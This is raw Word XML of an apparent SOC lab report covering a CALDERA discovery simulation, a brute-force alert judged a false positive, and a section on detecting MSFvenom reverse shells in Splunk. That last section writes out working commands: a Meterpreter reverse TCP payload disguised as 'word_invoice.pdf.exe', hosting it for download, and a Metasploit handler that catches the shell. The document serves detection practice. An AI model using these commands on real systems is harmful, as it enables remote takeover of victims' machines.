    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="67E0F374" w14:textId="75EFEAE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Choose index → Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="78505C8B" w14:textId="3E4D6C8C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="160" w:after="8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Summary of the CALDERA Attack Executed on Windows Host “Mark”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="73F7934F" w14:textId="3F70842B">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During the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previous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CALDERA operation, the agent deployed on the Windows machine “Mark” executed a series of reconnaissance and enumeration actions. No malware execution, persistence, or privilege‑escalation activities were involved. The attack was purely focused on information gathering and system discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0BC43324" w14:textId="7943E0C1">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observed behaviors included WMIC process enumeration,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tasklist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process enumeration, and PowerShell-based system enumeration. These actions map to MITRE ATT&amp;CK techniques such as T1057 – Process Discovery and T1082 – System Information Discovery, where the adversary collects details about running processes, system configuration, and host environment. The operation status “Collect”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indicates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that CALDERA was gathering data from the endpoint rather than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modifying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or compromising the system. Evidence for these activities appeared through Sysmon logs (Event ID 1 for process creation and 4104 for PowerShell activity)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forwarded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to Splunk via the Universal Forwarder. Overall, the executed attack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represented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 Reconnaissance/Discovery phase, serving as a baseline simulation before testing more advanced adversary behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="51F3A851" w14:textId="2B0E13CB">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4D886F0F" wp14:anchorId="05F14F1F">
            <wp:extent cx="5943600" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11169093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6909337" name="Picture 1116909337"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId713694224">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2209800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="282F2B94">
        <w:drawing>
          <wp:inline wp14:editId="3A59FF96" wp14:anchorId="3C78CA08">
            <wp:extent cx="5943600" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13204350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0435036" name="Picture 1320435036"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1972549255">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2447925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="504A5212" w14:textId="3A61A124">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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Brute Force Attack – Investigation Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7AAE55D7" w14:textId="7F112C43">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Incident Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4969F2A9" w14:textId="48E3A9D9">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An alert was triggered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indicating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multiple failed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logins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attempts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that could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represent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 potential brute‑force attack. The logs showed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5 failed login attempts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followed by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1 successful login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all originating from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localhost (127.0.0.1)</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53245B87" w14:textId="6A2C8289">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56EED801" wp14:anchorId="6E634B3B">
            <wp:extent cx="5943600" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="396695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669545" name="Picture 39669545"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId789947930">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Investigation Steps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2F3CDFF8" w14:textId="09F6EB07">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1. Log Review</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3E78CD27" w14:textId="5A02C432">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Analyzed Windows Security events:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="13080DB8" w14:textId="44E0A392">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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Event ID 4625</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 Failed logon attempts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0571D4A4" w14:textId="2FA1CF79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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Event ID 4624</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 Successful logon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="12AAA8F5" w14:textId="596D8906">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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All events were correlated and confirmed to originate from the same machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="180180E6" w14:textId="4D7C9C4B">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2. Source Verification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5A52D3D5" w14:textId="09E6DA11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Source IP for all attempts was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127.0.0.1</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indicating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the activity was performed locally.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6A67736E" w14:textId="5AFC6788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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workstation name matched the host, with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no signs of remote access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or network‑based authentication.</w:t>
      </w:r>
      <w:r w:rsidR="282F2B94">
        <w:drawing>
          <wp:inline wp14:editId="2EA5ACBE" wp14:anchorId="09FE8C53">
            <wp:extent cx="5943600" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9173456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7345666" name="Picture 917345666"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1879473608">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2352675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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3. User Activity Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="43DD6904" w14:textId="1DBFC8AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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The user account involved was a legitimate internal user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1F29F6E3" w14:textId="5F2927FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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successful login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immediately</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after failed attempts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indicates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the user was simply entering incorrect passwords before entering the correct one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6C07910A" w14:textId="1C074876">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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No suspicious processes or remote sessions were found during the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timeframe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37F55CBB" w14:textId="490DE5D4">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4. False Positive Determination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="74876C88" w14:textId="627DD1DF">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alert was classified as a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False Positive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due to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5C1206DF" w14:textId="345936A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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All activity being local (not network‑based).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="15ACE7C8" w14:textId="1B87B562">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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No abnormal behavior or indicators of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="76E2A7C3" w14:textId="4B4E9797">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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No external IP addresses or remote authentication attempts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involved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166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="0EF5F429" w14:textId="6560246F">
      <w:pPr>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2DEEC9CA" w14:textId="6B0D4913">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Detection Enhancement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="32EFAD8C" w14:textId="4FE6DAE2">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To reduce false positives and improve detection accuracy, the brute‑force rule was updated:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4E4EF813" w14:textId="2547ABD9">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Updated Detection Logic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="710652D9" w14:textId="57B4FB37">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The rule now triggers only if:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6E260247" w14:textId="09B3E700">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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20 or more failed login attempts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occur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within a 1‑minute window</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AND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="67E70DB8" w14:textId="33FB0DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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source IP is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not 127.0.0.1</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AND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4DB6590C" w14:textId="121CBD01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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LogonType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indicates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network‑based authentication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AND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0BE33239" w14:textId="1F8C3928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Events correlate across multiple fields (Username, Source IP, Workstation,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EventID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4B313200" w14:textId="774516BE">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This ensures that only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true brute‑force attempts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coming from remote sources generate alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="7C564C08" w14:textId="101863DE">
      <w:pPr>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2BAB3A9E" w14:textId="48F58BCE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Final Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="45A4B47D" w14:textId="7638CF9A">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incident was confirmed to be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non-malicious user activity</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and classified as a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False Positive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Detection logic was improved to prevent similar noise in the future. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6FDCC8C9" w14:textId="60834A28">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5. Detecting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MSFvenom</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 Reverse Shells with Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="556DEB41" w14:textId="6A967274">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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="648E8227" w14:textId="5B85D73A">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This simulation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demonstrates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generating a reverse shell payload using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MSFvenom</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executing it on Windows, and detecting its activity via Splunk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="247D46A6" w14:textId="6099D91C">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4C605E4A" w14:textId="26760969">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1. What Is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MSFvenom</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t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="383A4540" w14:textId="56C1CD66">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MSFvenom</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is a command‑line tool in the Metasploit Framework used to generate, encode, and package payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0FF71422" w14:textId="40C9A6E0">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Common uses:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4F2B0A1A" w14:textId="5620E4E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Creating payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="26FF75FC" w14:textId="6D204D05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Encoding to bypass detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2C3703AB" w14:textId="3FDFEDB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Embedding payloads in executables or scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4BB80E2E" w14:textId="732BFDEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Testing SOC defensive controls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="77A3BAFB" w14:textId="7FADDCE9">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Common options:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="156453AE" w14:textId="2E922B35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1861CCA6" w14:textId="28867CE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="038B4390" w14:textId="760ED777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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f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Output format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2FD7CD0B" w14:textId="5E202235">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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LHOST,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LPORT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Listener settings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="68D5D113" w14:textId="54F53460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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o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Output file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="3BF85F22" w14:textId="10CB63F1">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646EE15E" w14:textId="4D6D0DC9">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2. What Is a Reverse Shell?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="22E2D1A1" w14:textId="36395B31">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A reverse shell is a connection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initiated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by the victim machine back to the attacker. Once connected, the attacker gains command-line access for testing post-exploitation behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="0099826B" w14:textId="71B550F5">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456EB51D" w14:textId="7ACFC532">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3 Payload Creation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="50F7CEDF" w14:textId="753F14AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Generate a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Windows x64 reverse shell</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33E59737" w14:textId="73CD4D5C">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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msfvenom</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-p windows/x64/</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meterpreter</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reverse_tcp</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 x64 LHOST=192.168.1.150 LPORT=1234 -f exe &gt; /home/kali/Desktop/word_invoice.pdf.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="72F824B7" w14:textId="7E952934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Explanation</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235F0A3C" w14:textId="1A62C8CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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windows/x64/</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meterpreter</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reverse_tcp</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 Windows reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6EC34005" w14:textId="2F6DFD2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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LHOST / LPORT → Attacker IP and listening port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="48F4AA04" w14:textId="5B7E81DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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Output is a Windows executable named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word_invoice.pdf.exe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6F187A36" w14:textId="76BB2428">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="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br/>
      </w:r>
      <w:r w:rsidR="282F2B94">
        <w:drawing>
          <wp:inline wp14:editId="3907BD30" wp14:anchorId="44ED4970">
            <wp:extent cx="5943600" cy="2486025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2615477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1547717" name="Picture 261547717"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1333889127">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2486025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="075539B0" w14:textId="149B3FFA">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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6560AA27" w14:textId="245042A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Generates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Windows x64 reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5984555B" w14:textId="29C3BC60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Points back to the attacker’s IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="11DB8A65" w14:textId="7CF82B12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Outputs a disguised executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="439F0906" w14:textId="5E1CCBEE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="160" w:after="8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Delivering the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="048DEE6C" w14:textId="0D8C709C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Host the file on a Python HTTP server for download:</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sudo python3 -m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http.server</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2626</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="340782DE" w14:textId="2F0DEE59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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On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the Windows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VM, open a browser and download the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="218E9A65" w14:textId="403045D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Execute the payload by double-clicking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word_invoice.pdf.exe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3F417F9C" w14:textId="5C7DACD4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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On the attacker machine (Kali), run Metasploit multi/handler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="71B214BC" w14:textId="33BB33C6">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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use exploit/multi/handler</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set payload windows/x64/</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meterpreter</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/reverse_tcp</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set LHOST 192.168.1.150</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set LPORT 1234</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exploit</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 Meterpreter session opens, confirming that the reverse shell is active.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5355DC6F" w14:textId="4A8E30AA">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0ED72A9C" wp14:anchorId="0929C75C">
            <wp:extent cx="5943600" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2588834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8883437" name="Picture 258883437"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1216793959">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3590925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
